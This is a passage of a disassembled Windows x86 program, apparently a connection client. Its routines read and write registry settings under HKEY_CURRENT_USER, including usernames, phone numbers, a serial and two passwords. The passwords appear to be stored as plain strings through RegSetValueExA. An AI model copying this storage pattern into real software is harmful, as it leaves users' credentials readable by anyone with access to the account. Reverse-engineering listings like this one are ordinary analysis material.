cbData = dword ptr -4
push ebp
mov ebp, esp
sub esp, 448h
mov eax, [ecx+1Ch]
push ebx
push esi
mov [ebp+var_10], ecx
push edi
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push 71h ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_40], ebx
mov [ebp+var_3C], bl
mov [ebp+var_1E], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
mov edi, ds:lstrlenA
cmp esi, ebx
jz short loc_408A29
lea eax, [ebp+psz]
test eax, eax
jnz short loc_4089E4
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_408A2C
; ---------------------------------------------------------------------------
loc_4089E4: ; CODE XREF: sub_408980+56�j
lea ecx, [ebp+psz]
push ecx ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_408A2C
; ---------------------------------------------------------------------------
loc_408A29: ; CODE XREF: sub_408980+4C�j
mov [ebp+bstrString], ebx
loc_408A2C: ; CODE XREF: sub_408980+62�j
; sub_408980+A7�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_408A3A
mov [ebp+lpString], ebx
jmp short loc_408A70
; ---------------------------------------------------------------------------
loc_408A3A: ; CODE XREF: sub_408980+B3�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], ebx
xor ebx, ebx
loc_408A70: ; CODE XREF: sub_408980+B8�j
mov ecx, [ebp+lpString]
push ecx ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, eax
mov eax, [ebp+bstrString]
cmp eax, ebx
mov [ebp+var_14], edi
jnz short loc_408A8A
xor esi, esi
jmp short loc_408A93
; ---------------------------------------------------------------------------
loc_408A8A: ; CODE XREF: sub_408980+104�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_408A93: ; CODE XREF: sub_408980+108�j
lea eax, [esi+edi]
push eax ; ui
push ebx ; strIn
mov [ebp+var_18], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_408AEE
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_18]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_408AEE: ; CODE XREF: sub_408980+125�j
mov edx, [ebp+var_10]
push 7Ah ; bstrString
lea ecx, [ebp+bstrString]
mov eax, [edx+1Ch]
push eax ; hInstance
call sub_40A840
lea ecx, [ebp+hKey]
push ecx ; phkResult
push 20019h ; samDesired
push 0 ; ulOptions
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_408B96
mov ecx, [ebp+hKey]
lea edx, [ebp+cbData]
mov esi, ds:RegQueryValueExA
push edx ; lpcbData
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push 0 ; lpReserved
push offset aCc ; "cc"
push ecx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_408B85
lea edx, [ebp+cbData]
lea eax, [ebp+Data]
push edx ; lpcbData
mov edx, [ebp+hKey]
lea ecx, [ebp+Type]
push eax ; lpData
push ecx ; lpType
push 0 ; lpReserved
push offset aCc ; "cc"
push edx ; hKey
call esi ; RegQueryValueExA
mov eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax
lea edx, [ebp+var_148]
push ecx
push edx
call sub_40B070
mov eax, [ebp+cbData]
add esp, 0Ch
mov [ebp+eax+var_148], 0
jmp short loc_408B8C
; ---------------------------------------------------------------------------
loc_408B85: ; CODE XREF: sub_408980+1C0�j
mov [ebp+var_148], 0
loc_408B8C: ; CODE XREF: sub_408980+203�j
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_408B96: ; CODE XREF: sub_408980+1A0�j
lea edx, [ebp+var_148]
push edx
call sub_40BD96
mov esi, eax
mov eax, [ebp+lpMem]
add esp, 4
test eax, eax
jz short loc_408BBE
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], 0
loc_408BBE: ; CODE XREF: sub_408980+22C�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
lea esp, [ebp-454h]
mov eax, esi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_408980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __fastcall sub_408BE0(int)
sub_408BE0 proc near ; CODE XREF: sub_4010C0+3AC�p
; sub_405830+12E�p
push esi
push edi
mov esi, ecx
xor edi, edi
push offset a2_0 ; "2.0"
push esi ; int
mov [esi], edi
mov [esi+4], edi
call sub_408E00
mov [esi+28h], edi
mov [esi+24h], edi
lea eax, [esi+10h]
mov ecx, 2
loc_408C04: ; CODE XREF: sub_408BE0+30�j
mov [eax-8], edi
mov [eax], edi
mov [eax+8], edi
add eax, 4
dec ecx
jnz short loc_408C04
mov [esi+20h], edi
mov eax, esi
pop edi
pop esi
retn
sub_408BE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408C20 proc near ; CODE XREF: sub_404570+C�p
; sub_405830+23D�p
push ebx
push ebp
push esi
push edi
mov edi, ecx
mov eax, [edi]
push eax ; lpMem
call sub_40AF10
mov ecx, [edi+4]
xor ebx, ebx
push ecx ; lpMem
mov [edi], ebx
call sub_40AF10
add esp, 8
mov [edi+4], ebx
lea esi, [edi+10h]
mov ebp, 2
loc_408C49: ; CODE XREF: sub_408C20+64�j
mov eax, [esi-8]
cmp eax, ebx
jz short loc_408C5C
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esi-8], ebx
loc_408C5C: ; CODE XREF: sub_408C20+2E�j
mov eax, [esi]
cmp eax, ebx
jz short loc_408C6D
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esi], ebx
loc_408C6D: ; CODE XREF: sub_408C20+40�j
mov eax, [esi+8]
cmp eax, ebx
jz short loc_408C80
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esi+8], ebx
loc_408C80: ; CODE XREF: sub_408C20+52�j
add esi, 4
dec ebp
jnz short loc_408C49
mov eax, [edi+20h]
cmp eax, ebx
jz short loc_408C99
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [edi+20h], ebx
loc_408C99: ; CODE XREF: sub_408C20+6B�j
mov eax, [edi+28h]
cmp eax, ebx
jz short loc_408CAC
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [edi+28h], ebx
loc_408CAC: ; CODE XREF: sub_408C20+7E�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_408C20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408CC0 proc near ; CODE XREF: sub_405830+14B�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push edi
mov edi, ecx
mov eax, [ebp+0]
mov ecx, [edi]
push eax ; lpString2
push ecx ; lpString1
mov ecx, edi
call sub_408DD0
test al, al
jz short loc_408D41
mov edx, [ebp+4]
mov eax, [edi+4]
push edx ; lpString2
push eax ; lpString1
mov ecx, edi
call sub_408DD0
test al, al
jz short loc_408D41
mov eax, [esp+10h+arg_0]
xor ebx, ebx
add ebp, 10h
sub eax, edi
lea esi, [edi+8]
mov [esp+10h+arg_0], eax
jmp short loc_408D07
; ---------------------------------------------------------------------------
loc_408D03: ; CODE XREF: sub_408CC0+76�j
mov eax, [esp+10h+arg_0]
loc_408D07: ; CODE XREF: sub_408CC0+41�j
mov ecx, [eax+esi]
mov edx, [esi]
push ecx ; lpString2
push edx ; lpString1
mov ecx, edi
call sub_408DD0
test al, al
jz short loc_408D41
mov eax, [ebp+0]
mov ecx, [esi+8]
push eax ; lpString2
push ecx ; lpString1
mov ecx, edi
call sub_408DD0
test al, al
jz short loc_408D41
inc ebx
add esi, 4
add ebp, 4
cmp ebx, 2
jl short loc_408D03
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_408D41: ; CODE XREF: sub_408CC0+1A�j
; sub_408CC0+2D�j ...
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 4
sub_408CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_408D50(int,int)
sub_408D50 proc near ; CODE XREF: sub_405830+232�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
mov ebp, [esp+0Ch+arg_0]
push esi
push edi
mov esi, ecx
mov eax, [ebp+0]
push eax ; lpString2
push esi ; int
call sub_408E00
mov ecx, [ebp+4]
lea edx, [esi+4]
push ecx ; lpString2
push edx ; int
mov ecx, esi
call sub_408E00
lea ebx, [ebp+10h]
lea edi, [esi+8]
sub ebp, esi
mov [esp+14h+var_4], 2
loc_408D84: ; CODE XREF: sub_408D50+5D�j
mov eax, [edi+ebp]
mov ecx, esi
push eax ; lpString2
push edi ; int
call sub_408E00
mov ecx, [ebx]
lea edx, [edi+8]
push ecx ; lpString2
push edx ; int
mov ecx, esi
call sub_408E00
mov eax, [esp+14h+var_4]
add edi, 4
add ebx, 4
dec eax
mov [esp+14h+var_4], eax
jnz short loc_408D84
mov edi, [esp+14h+arg_0]
lea ecx, [esi+20h]
mov eax, [edi+20h]
push eax ; lpString2
push ecx ; int
mov ecx, esi
call sub_408E00
mov edx, [edi+24h]
pop edi
mov [esi+24h], edx
pop esi
pop ebp
pop ebx
pop ecx
retn 4
sub_408D50 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_408DD0(LPCSTR lpString1,LPCSTR lpString2)
sub_408DD0 proc near ; CODE XREF: sub_408CC0+13�p
; sub_408CC0+26�p ...
lpString1 = dword ptr 4
lpString2 = dword ptr 8
mov ecx, [esp+lpString1]
test ecx, ecx
jz short loc_408DF0
mov eax, [esp+lpString2]
test eax, eax
jz short loc_408DF0
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
setz al
retn 8
; ---------------------------------------------------------------------------
loc_408DF0: ; CODE XREF: sub_408DD0+6�j
; sub_408DD0+E�j
xor al, al
retn 8
sub_408DD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_408E00(int,LPCSTR lpString2)
sub_408E00 proc near ; CODE XREF: sub_408BE0+11�p
; sub_408D50+10�p ...
arg_0 = dword ptr 4
lpString2 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi]
test eax, eax
jz short loc_408E15
push eax ; lpMem
call sub_40AF10
add esp, 4
loc_408E15: ; CODE XREF: sub_408E00+A�j
mov esi, [esp+8+lpString2]
test esi, esi
jnz short loc_408E26
mov [edi], esi
pop edi
mov al, 1
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_408E26: ; CODE XREF: sub_408E00+1B�j
push esi ; lpString
call ds:lstrlenA ; lstrlenA
inc eax
push eax ; dwBytes
call sub_40AE50
add esp, 4
mov [edi], eax
test eax, eax
jnz short loc_408E44
pop edi
xor al, al
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_408E44: ; CODE XREF: sub_408E00+3B�j
push esi ; lpString2
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
pop edi
mov al, 1
pop esi
retn 8
sub_408E00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_408E60(int,int,LPCSTR lpString2)
sub_408E60 proc near ; CODE XREF: sub_408E90+4D�p
; sub_409350+E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
lpString2 = dword ptr 0Ch
mov eax, [esp+arg_0]
cmp eax, 1
jl short loc_408E84
cmp eax, 2
jg short loc_408E84
mov edx, [esp+lpString2]
push edx ; lpString2
mov edx, [esp+4+arg_4]
lea eax, [edx+eax*4-4]
push eax ; int
call sub_408E00
retn 0Ch
; ---------------------------------------------------------------------------
loc_408E84: ; CODE XREF: sub_408E60+7�j
; sub_408E60+C�j
xor al, al
retn 0Ch
sub_408E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_408E90(int,int,HINSTANCE hInstance,UINT uID)
sub_408E90 proc near ; CODE XREF: sub_4092D0+13�p
; sub_409310+13�p
String2 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
hInstance = dword ptr 0Ch
uID = dword ptr 10h
mov edx, [esp+hInstance]
sub esp, 400h
lea eax, [esp+400h+String2]
push esi
mov esi, ecx
mov ecx, [esp+404h+uID]
push 400h ; cchBufferMax
push eax ; lpBuffer
push ecx ; uID
push edx ; hInstance
call ds:LoadStringA ; LoadStringA
test eax, eax
jnz short loc_408EC6
xor al, al
pop esi
add esp, 400h
retn 10h
; ---------------------------------------------------------------------------
loc_408EC6: ; CODE XREF: sub_408E90+28�j
mov ecx, [esp+404h+arg_4]
mov edx, [esp+404h+arg_0]
lea eax, [esp+404h+String2]
push eax ; lpString2
push ecx ; int
push edx ; int
mov ecx, esi
call sub_408E60
pop esi
add esp, 400h
retn 10h
sub_408E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408EF0 proc near ; CODE XREF: sub_4092F0+9�p
; sub_409330+9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 1
jl short loc_408F09
cmp eax, 2
jg short loc_408F09
mov ecx, [esp+arg_4]
mov eax, [ecx+eax*4-4]
retn 8
; ---------------------------------------------------------------------------
loc_408F09: ; CODE XREF: sub_408EF0+7�j
; sub_408EF0+C�j
xor eax, eax
retn 8
sub_408EF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_408F10(DWORD Type,LPCSTR cbData,int)
sub_408F10 proc near ; CODE XREF: sub_408FC0+64�p
; sub_408FC0+81�p ...
Type = dword ptr 4
cbData = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+Type]
push ebp
mov ebp, ds:RegQueryValueExA
mov edx, [ebx]
push esi
lea eax, [esp+0Ch+cbData]
push edi
mov edi, [esp+10h+cbData]
push eax ; lpcbData
lea ecx, [esp+14h+Type]
push 0 ; lpData
push ecx ; lpType
push 0 ; lpReserved
push edi ; lpValueName
push edx ; hKey
call ebp ; RegQueryValueExA
test eax, eax
jz short loc_408F43
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_408F43: ; CODE XREF: sub_408F10+28�j
cmp [esp+10h+Type], 1
jz short loc_408F53
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_408F53: ; CODE XREF: sub_408F10+38�j
mov esi, [esp+10h+arg_8]
mov eax, [esi]
test eax, eax
jz short loc_408F66
push eax ; lpMem
call sub_40AF10
add esp, 4
loc_408F66: ; CODE XREF: sub_408F10+4B�j
mov eax, [esp+10h+cbData]
inc eax
push eax ; dwBytes
call sub_40AE50
add esp, 4
mov [esi], eax
test eax, eax
jnz short loc_408F83
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_408F83: ; CODE XREF: sub_408F10+68�j
lea ecx, [esp+10h+cbData]
lea edx, [esp+10h+Type]
push ecx ; lpcbData
push eax ; lpData
mov eax, [ebx]
push edx ; lpType
push 0 ; lpReserved
push edi ; lpValueName
push eax ; hKey
call ebp ; RegQueryValueExA
test eax, eax
jz short loc_408FB4
mov ecx, [esi]
push ecx ; lpMem
call sub_40AF10
add esp, 4
mov dword ptr [esi], 0
xor al, al
pop edi
pop esi
pop ebp
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_408FB4: ; CODE XREF: sub_408F10+88�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
retn 0Ch
sub_408F10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_408FC0(int,LPCSTR phkResult)
sub_408FC0 proc near ; CODE XREF: sub_405830+10F�p
; sub_407EC0+10D�p
lpMem = dword ptr -0Ch
var_8 = dword ptr -8
dwDisposition = dword ptr -4
phkResult = dword ptr 4
sub esp, 0Ch
push esi
mov esi, ecx
push edi
mov edi, [esp+14h+phkResult]
lea eax, [esi+28h]
push edi ; lpString2
push eax ; int
call sub_408E00
lea ecx, [esp+14h+dwDisposition]
lea edx, [esp+14h+phkResult]
push ecx ; lpdwDisposition
push edx ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
push edi ; lpSubKey
push 80000001h ; hKey
mov [esp+38h+phkResult], 0
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jz short loc_40900E
pop edi
xor al, al
pop esi
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_40900E: ; CODE XREF: sub_408FC0+42�j
push ebx
push esi ; int
lea eax, [esp+1Ch+phkResult]
push offset cbData ; "version"
push eax ; Type
mov ecx, esi
mov [esp+24h+lpMem], 0
call sub_408F10
test al, al
jz loc_40910A
lea ecx, [esi+4]
lea edx, [esp+18h+phkResult]
push ecx ; int
push offset aSerial ; "serial"
push edx ; Type
mov ecx, esi
call sub_408F10
test al, al
jz loc_40910A
lea eax, [esi+8]
lea ecx, [esp+18h+phkResult]
push eax ; int
push offset aUsername1 ; "username1"
push ecx ; Type
mov ecx, esi
call sub_408F10
test al, al
jz loc_40910A
lea edx, [esi+0Ch]
lea eax, [esp+18h+phkResult]
push edx ; int
push offset aUsername2 ; "username2"
push eax ; Type
mov ecx, esi
call sub_408F10
test al, al
jz loc_40910A
lea ecx, [esi+10h]
lea edx, [esp+18h+phkResult]
push ecx ; int
push offset aPassword1 ; "password1"
push edx ; Type
mov ecx, esi
call sub_408F10
test al, al
jz short loc_40910A
lea eax, [esi+14h]
lea ecx, [esp+18h+phkResult]
push eax ; int
push offset aPassword2 ; "password2"
push ecx ; Type
mov ecx, esi
call sub_408F10
test al, al
jz short loc_40910A
lea edx, [esi+18h]
lea eax, [esp+18h+phkResult]
push edx ; int
push offset aPhonenumber1 ; "phonenumber1"
push eax ; Type
mov ecx, esi
call sub_408F10
test al, al
jz short loc_40910A
lea ecx, [esi+1Ch]
lea edx, [esp+18h+phkResult]
push ecx ; int
push offset aPhonenumber2 ; "phonenumber2"
push edx ; Type
mov ecx, esi
call sub_408F10
test al, al
jz short loc_40910A
lea eax, [esp+18h+lpMem]
lea ecx, [esp+18h+phkResult]
push eax ; int
push offset aConnecttime ; "connecttime"
push ecx ; Type
mov ecx, esi
call sub_408F10
test al, al
jz short loc_40910A
mov bl, 1
jmp short loc_40910C
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408FC0+6B�j
; sub_408FC0+88�j ...
xor bl, bl
loc_40910C: ; CODE XREF: sub_408FC0+148�j
mov edx, [esp+18h+phkResult]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
cmp bl, 1
jnz short loc_40913D
mov ecx, [esp+18h+lpMem]
lea eax, [esp+18h+var_8]
push 0Ah
push eax
push ecx
call sub_40B26C
mov edx, [esp+24h+var_8]
mov [esi+24h], eax
add esp, 0Ch
cmp byte ptr [edx], 0
setz bl
loc_40913D: ; CODE XREF: sub_408FC0+15A�j
mov eax, [esp+18h+lpMem]
test eax, eax
jz short loc_40914E
push eax ; lpMem
call sub_40AF10
add esp, 4
loc_40914E: ; CODE XREF: sub_408FC0+183�j
mov al, bl
pop ebx
pop edi
pop esi
add esp, 0Ch
retn 4
sub_408FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409160(int,LPCSTR lpValueName,LPCSTR lpData)
sub_409160 proc near ; CODE XREF: sub_409190+60�p
; sub_409190+7D�p ...
arg_0 = dword ptr 4
lpValueName = dword ptr 8
lpData = dword ptr 0Ch
push esi
mov esi, [esp+4+lpData]
push esi ; lpString
call ds:lstrlenA ; lstrlenA
mov ecx, [esp+4+arg_0]
push eax ; cbData
mov eax, [esp+8+lpValueName]
push esi ; lpData
mov edx, [ecx]
push 1 ; dwType
push 0 ; Reserved
push eax ; lpValueName
push edx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
test eax, eax
setz al
pop esi
retn 0Ch
sub_409160 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409190(LPCSTR dwDisposition)
sub_409190 proc near ; CODE XREF: sub_4092B0+B�p
hKey = dword ptr -44h
Data = byte ptr -40h
dwDisposition = dword ptr 4
sub esp, 44h
push ebx
push esi
mov esi, ecx
mov edx, [esp+4Ch+dwDisposition]
lea eax, [esp+4Ch+dwDisposition]
lea ecx, [esp+4Ch+hKey]
xor ebx, ebx
push eax ; lpdwDisposition
push ecx ; phkResult
push ebx ; lpSecurityAttributes
push 0F003Fh ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push edx ; lpSubKey
push 80000001h ; hKey
mov [esp+70h+hKey], ebx
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jz short loc_4091CE
pop esi
xor al, al
pop ebx
add esp, 44h
retn 4
; ---------------------------------------------------------------------------
loc_4091CE: ; CODE XREF: sub_409190+32�j
mov ecx, [esi+24h]
lea eax, [esp+4Ch+Data]
push 0Ah
push eax
push ecx
call sub_40BE1D
mov edx, [esi]
add esp, 0Ch
lea eax, [esp+4Ch+hKey]
mov ecx, esi
push edx ; lpData
push offset cbData ; "version"
push eax ; int
call sub_409160
test al, al
jz loc_40929A
mov ecx, [esi+4]
lea edx, [esp+4Ch+hKey]
push ecx ; lpData
push offset aSerial ; "serial"
push edx ; int
mov ecx, esi
call sub_409160
test al, al
jz loc_40929A
mov eax, [esi+8]
lea ecx, [esp+4Ch+hKey]
push eax ; lpData
push offset aUsername1 ; "username1"
push ecx ; int
mov ecx, esi
call sub_409160
test al, al
jz short loc_40929A
mov edx, [esi+0Ch]
lea eax, [esp+4Ch+hKey]
push edx ; lpData
push offset aUsername2 ; "username2"
push eax ; int
mov ecx, esi
call sub_409160
test al, al
jz short loc_40929A
mov ecx, [esi+10h]
lea edx, [esp+4Ch+hKey]
push ecx ; lpData
push offset aPassword1 ; "password1"
push edx ; int
mov ecx, esi
call sub_409160
test al, al
jz short loc_40929A
mov eax, [esi+14h]
lea ecx, [esp+4Ch+hKey]
push eax ; lpData
push offset aPassword2 ; "password2"
push ecx ; int
mov ecx, esi
call sub_409160
test al, al
jz short loc_40929A
lea edx, [esp+4Ch+Data]
lea eax, [esp+4Ch+hKey]
push edx ; lpData
push offset aConnecttime ; "connecttime"
push eax ; int
mov ecx, esi
call sub_409160
test al, al
jz short loc_40929A
mov bl, 1
loc_40929A: ; CODE XREF: sub_409190+67�j
; sub_409190+84�j ...
mov ecx, [esp+4Ch+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
mov al, bl
pop esi
pop ebx
add esp, 44h
retn 4
sub_409190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4092B0 proc near ; CODE XREF: sub_405C90+70D�p
; sub_406720+517�p
mov eax, [ecx+28h]
test eax, eax
jnz short loc_4092BA
xor al, al
retn
; ---------------------------------------------------------------------------
loc_4092BA: ; CODE XREF: sub_4092B0+5�j
push eax ; dwDisposition
call sub_409190
retn
sub_4092B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_4092D0(int,HINSTANCE hInstance,UINT uID)
sub_4092D0 proc near ; CODE XREF: sub_4057D0+1F�p
; sub_4057D0+2E�p
arg_0 = dword ptr 4
hInstance = dword ptr 8
uID = dword ptr 0Ch
mov eax, [esp+uID]
mov edx, [esp+hInstance]
push eax ; uID
push edx ; hInstance
mov edx, [esp+8+arg_0]
lea eax, [ecx+8]
push eax ; int
push edx ; int
call sub_408E90
retn 0Ch
sub_4092D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4092F0 proc near ; CODE XREF: sub_405830+256�p
; sub_406720+467�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
lea eax, [ecx+8]
push eax
push edx
call sub_408EF0
retn 4
sub_4092F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409310(int,HINSTANCE hInstance,UINT uID)
sub_409310 proc near ; CODE XREF: sub_4057D0+3D�p
; sub_4057D0+4C�p
arg_0 = dword ptr 4
hInstance = dword ptr 8
uID = dword ptr 0Ch
mov eax, [esp+uID]
mov edx, [esp+hInstance]
push eax ; uID
push edx ; hInstance
mov edx, [esp+8+arg_0]
lea eax, [ecx+10h]
push eax ; int
push edx ; int
call sub_408E90
retn 0Ch
sub_409310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409330 proc near ; CODE XREF: sub_405830+26B�p
; sub_406720+47C�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
lea eax, [ecx+10h]
push eax
push edx
call sub_408EF0
retn 4
sub_409330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409350(int,LPCSTR lpString2)
sub_409350 proc near ; CODE XREF: sub_406E60+8FE�p
; sub_406E60+90E�p ...
arg_0 = dword ptr 4
lpString2 = dword ptr 8
mov eax, [esp+lpString2]
lea edx, [ecx+18h]
push eax ; lpString2
mov eax, [esp+4+arg_0]
push edx ; int
push eax ; int
call sub_408E60
retn 8
sub_409350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409370 proc near ; CODE XREF: sub_405830+290�p
; sub_406720+491�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
lea eax, [ecx+18h]
push eax
push edx
call sub_408EF0
retn 4
sub_409370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409390(LPCSTR lpString2)
sub_409390 proc near ; CODE XREF: sub_4093B0+3D�p
lpString2 = dword ptr 4
mov eax, [esp+lpString2]
lea edx, [ecx+20h]
push eax ; lpString2
push edx ; int
call sub_408E00
retn 4
sub_409390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_4093B0(HINSTANCE hInstance,UINT uID)
sub_4093B0 proc near ; CODE XREF: sub_405830+24D�p
String2 = byte ptr -400h
hInstance = dword ptr 4
uID = dword ptr 8
mov edx, [esp+hInstance]
sub esp, 400h
lea eax, [esp+400h+String2]
push esi
mov esi, ecx
mov ecx, [esp+404h+uID]
push 400h ; cchBufferMax
push eax ; lpBuffer
push ecx ; uID
push edx ; hInstance
call ds:LoadStringA ; LoadStringA
test eax, eax
jnz short loc_4093E6
xor al, al
pop esi
add esp, 400h
retn 8
; ---------------------------------------------------------------------------
loc_4093E6: ; CODE XREF: sub_4093B0+28�j
lea eax, [esp+404h+String2]
mov ecx, esi
push eax ; lpString2
call sub_409390
pop esi
add esp, 400h
retn 8
sub_4093B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409400 proc near ; CODE XREF: sub_406720+33B�p
mov eax, [ecx+20h]
retn
sub_409400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409410 proc near ; CODE XREF: sub_4057D0+55�p
; sub_406720+510�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+24h], eax
retn 4
sub_409410 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409420 proc near ; CODE XREF: sub_405830+205�p
; sub_406720+506�p
mov eax, [ecx+24h]
retn
sub_409420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409430(LPCSTR lpString2)
sub_409430 proc near ; CODE XREF: sub_409450+3D�p
lpString2 = dword ptr 4
mov eax, [esp+lpString2]
lea edx, [ecx+4]
push eax ; lpString2
push edx ; int
call sub_408E00
retn 4
sub_409430 endp
